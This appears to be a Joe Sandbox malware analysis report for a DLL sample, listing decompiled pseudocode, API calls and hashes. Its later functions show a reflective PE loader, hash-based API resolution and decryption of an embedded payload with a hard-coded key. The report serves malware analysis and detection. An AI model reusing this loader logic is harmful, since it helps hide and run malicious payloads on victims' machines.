String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

0x1000ccd3
0x1000ccd6
0x1000ccde
0x1000cce4
0x1000cce4
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccfc
0x1000ccfe
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x1000cd36

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,3643B451), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,3643B451), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,3643B451), ref: 10012920

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0x3643b451
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000ad2a
0x1000ad31
0x1000ad37
0x1000ad47
0x1000ad4f
0x1000ada6
0x1000ada6
0x1000ada6
0x1000ad55
0x1000ad5d
0x1000ad63
0x1000ad6b
0x1000ad6c
0x1000ad70
0x1000ad7b
0x1000ad81
0x1000ad82
0x1000ad83
0x00000000
0x1000ad85
0x1000ad90
0x1000ad9f
0x1000ad9f
0x1000ad83
0x1000adb4

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

0x10002676
0x1000267f
0x10002682
0x10002693
0x1000269d
0x100026b1
0x100026bf
0x100026f7
0x100026f9
0x100026fc
0x10002703
0x1000272e
0x10002733
0x10002736
0x1000273d
0x1000276f
0x10002781
0x10002790
0x10002799
0x100027bd
0x100027c9
0x1000279b
0x100027a3
0x100027af
0x100027af
0x100027e0
0x100027f3
0x10002825
0x10002840
0x10002842
0x10002848
0x100027f5
0x10002811
0x10002813
0x10002819
0x10002819
0x10002850
0x100027d4
0x100027dd
0x00000000
0x10002852
0x10002852
0x00000000
0x10002852
0x10002850
0x10002864
0x100026bc
0x00000000
0x100026bc
0x10002877
0x1000287e
0x00000000
0x1000287e
0x10002750
0x10002757
0x1000275d
0x00000000
0x1000275d
0x10002707
0x1000270d
0x00000000
0x1000270d
0x00000000
0x1000288b
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

0x1001431b
0x1001431b
0x1001431b
0x1001431c
0x10014320
0x10014323
0x10014325
0x10014325
0x10014331
0x10014333
0x10014333
0x10014338
0x1001433f
0x10014340
0x10014341
0x10014350
0x10014357
0x1001435c
0x10014363
0x10014366
0x1001436c
0x1001436c
0x10014373
0x10014373
0x1001437f
0x10014385

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x10013990
0x10013993
0x10013993
0x10013997
0x1001399d
0x100139a3
0x100139cc
0x100139cd
0x00000000
0x100139d3
0x100139a5
0x100139a8
0x00000000
0x00000000
0x100139ac
0x100139b4
0x00000000
0x100139bb
0x100139c2
0x00000000
0x100139c8

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4892 Parent PID: 5872 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	13.6%
Signature Coverage:	0%
Total number of Nodes:	354
Total number of Limit Nodes:	25

Executed Functions

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
